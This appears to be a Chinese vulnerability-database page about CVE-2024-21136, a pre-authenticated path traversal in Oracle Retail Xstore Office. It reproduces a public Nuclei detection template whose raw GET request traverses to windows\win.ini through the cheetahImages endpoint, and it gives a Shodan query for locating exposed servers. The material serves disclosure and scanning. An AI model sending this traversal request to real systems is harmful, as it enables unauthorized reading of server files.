CVE-2024-21136: Oracle Retail Xstore Suite - Pre-authenticated Path Traversal

日期: 2025-08-01 | 影响软件: Oracle Retail Xstore Suite | POC: 已公开

漏洞描述

Vulnerability in the Oracle Retail Xstore Office product of Oracle Retail Applications (component: Security). Supported versions that are affected are 19.0.5, 20.0.3, 20.0.4, 22.0.0 and 23.0.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Retail Xstore Office. While the vulnerability is in Oracle Retail Xstore Office, attacks may significantly impact additional products (scope change).

PoC代码[已公开]

id: CVE-2024-21136

info:
  name: Oracle Retail Xstore Suite - Pre-authenticated Path Traversal
  author: DhiyaneshDk
  severity: high
  description: |
    Vulnerability in the Oracle Retail Xstore Office product of Oracle Retail Applications (component: Security). Supported versions that are affected are 19.0.5, 20.0.3, 20.0.4, 22.0.0 and 23.0.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Retail Xstore Office. While the vulnerability is in Oracle Retail Xstore Office, attacks may significantly impact additional products (scope change).
  impact: |
    Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Retail Xstore Office accessible data.
  reference:
    - https://www.oracle.com/security-alerts/cpuapr2024.html
    - https://www.synacktiv.com/en/advisories/oracle-retail-xstore-suite-pre-authenticated-path-traversal
    - https://nvd.nist.gov/vuln/detail/CVE-2024-21136
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2024-21136
    epss-score: 0.38978
    epss-percentile: 0.97179
    cpe: cpe:2.3:a:oracle:retail_xstore_office:19.0.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: oracle
    product: retail_xstore_office
    shodan-query: html:"xstoremgwt"
  tags: cve,cve2024,oracle,xstore,lfi,vkev

http:
  - raw:
      - |
        GET /xstoremgwt/cheetahImages?imageId=..\..\..\..\windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'for 16-bit app support'
          - '[fonts]'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009037fb6b5e6b0fd4d7b83836ac59aa8fd39881eea312618e161f8faf092a4597022100da22dfcb9212fefb9953f2a0ca03fff82b015ffe8a80017e9a044d250dfa4c62:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-21136.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893） 无POC

Whoogle search 代码执行漏洞（CVE-2024-53305） 无POC

Wordpress WooCommerce Ultimate Gift Card /wp-admin/admin-ajax.php mwb_wgm_preview_mail 文件上传漏洞（CVE-2024-8425） 无POC

DataCube3 exec.php SQL 注入漏洞（CVE-2024-25833） 无POC

Appsmith postgres 代码执行漏洞（CVE-2024-55963） 无POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893）无POC

Whoogle search 代码执行漏洞（CVE-2024-53305）无POC

Wordpress WooCommerce Ultimate Gift Card /wp-admin/admin-ajax.php mwb_wgm_preview_mail 文件上传漏洞（CVE-2024-8425）无POC

DataCube3 exec.php SQL 注入漏洞（CVE-2024-25833）无POC

Appsmith postgres 代码执行漏洞（CVE-2024-55963）无POC